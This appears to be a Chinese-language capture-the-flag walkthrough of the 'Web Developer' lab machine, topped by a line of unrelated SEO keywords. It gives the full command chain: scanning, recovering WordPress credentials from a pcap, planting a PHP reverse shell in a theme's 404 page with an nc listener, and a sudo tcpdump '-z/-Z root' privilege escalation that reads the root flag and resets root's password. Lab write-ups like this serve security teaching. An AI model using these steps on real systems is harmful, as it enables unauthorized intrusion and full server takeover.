免费动态素材网站换友情链接的网站

免费动态素材网站,换友情链接的网站,高级网站开发工信部,国际著名平面设计作品虚拟机网络配置 虚拟机kali和Web Developer都用NAT模式 扫描靶机 kali查看自己的ip kali的ip是192.168.138.128#xff0c;子网掩码是255.255.255.0 扫描存活主机 netdiscover -i eth0 -r 192.168.138.0/24 知道到靶机ip 192.168.138.130 nmap扫描端口和服务及版本 nma…虚拟机网络配置虚拟机kali和Web Developer都用NAT模式扫描靶机kali查看自己的ipkali的ip是192.168.138.128子网掩码是255.255.255.0扫描存活主机netdiscover -i eth0 -r 192.168.138.0/24知道到靶机ip 192.168.138.130nmap扫描端口和服务及版本nmap -sS -sV -sC -p- 192.168.138.130看到Web Developer开放22号端口和80号端口提供ssh服务和http服务网站搭建使用了WordPress 4.9.8模板这个版本的模板是有漏洞的。也可以用whatweb再确定网站使用的模板whatweb -v http://192.168.138.130确定网站用了WordPress 4.9.8模板访问网站发现登录入口进入登录页面没有用户名密码回去接着找信息获取网站账户密码用dirb爆破目录dirb http://192.168.138.130知道一个看起来和网络流量有关的目录进去看看发现一个cap文件下载下来用wireshark打开过滤post请求看有没有跟登录有关的。wp-login.php明显跟登录有关实际上它就是刚才进去过的登录页面。打开发现账号密码明文传输获得用户名webdeveloper密码Te5eQg4sBS!Yr$)wf%(DcAd用这个账号密码登录进入后台提权点击Apparance点击Editor发现可以编辑页面源码尝试把404页面的源码换成kali自带的反弹shell的脚本。如果成功注入那么访问该页面时该脚本就会对kali发起tcp连接该CMS为PHP开发可以利用其实现反弹shell我们就可以在kali使用shell命令控制靶机。脚本在 /usr/share/webshells/php 目录下在后台选择404页面的源码把脚本的代码复制进去替换掉原代码ctrlf查找$ip找到定义ip的位置把ip换成kali的ip端口想换的话也可以换点击update file失败了将主题改为Twenty Sixteen再尝试改完要点击select生效select之后页面刷新重新选中404再把代码替换掉把IP换成kali的IPupdate file成功了接下来在kali用nc监听刚才代码里设定的端口在浏览器访问404页面http://192.168.138.130/wp-content/themes/twentysixteen/404.phpkali中已经收到反弹回来的shell可以在这里输入命令了到网站根目录 /var/www/html 下看有什么可利用的文件发现配置文件查看配置文件有什么信息cat wp-config.php找到数据库的用户名和密码用户名webdeveloper密码MasterOfTheUniverse用ssh登录服务器成功获取flag修改root用户密码尝试查看/root/flag.txt权限不足用sudo还是权限不足要root权限才能查看flag看一下当前身份可以执行什么命令发现可以root权限执行tcpdump。tcpdump是一个抓包工具它虽然不能让我们直接获得root权限但它有一个特点可以指定用户来执行指定的命令。这里有两种选择:1.直接用tcpdump指定root用户来执行获取flag的命令2.用tcpdump指定root用户执行修改密码的命令然后就可以登录root用户有了root权限就可以拿到flag。接下来两种方式都试一下直接用tcpdump指定root用户来执行获取flag的命令先创建一个用来放命令的文件touch /tmp/exploit写入命令echo cat /root/flag.txt /tmp/exploit给该文件赋予可执行权限chmod x /tmp/exploit用tcpdump指定root用户执行命令tcpdump参数-i eth0 从指定网卡捕获数据包-w /dev/null 将捕获到的数据包输出到空设备不输出数据包结果-z [command] 运行指定的命令-Z [user] 指定用户执行命令-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储-W [num] 指定抓包数量sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root成功读取flag.txt的内容修改root用户的密码后登录root用户获取flag和上面一样创建文件赋予可执行权限只是写入文件的命令不同上面的命令是获取flag.txt的内容这里换成给root用户改密码echo echo 新密码\n新密码 | passwd root /tmp/exploit然后用tcpdump指定root用户执行命令还是和上面一样sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root改密码成功用新密码登录root用户获取flag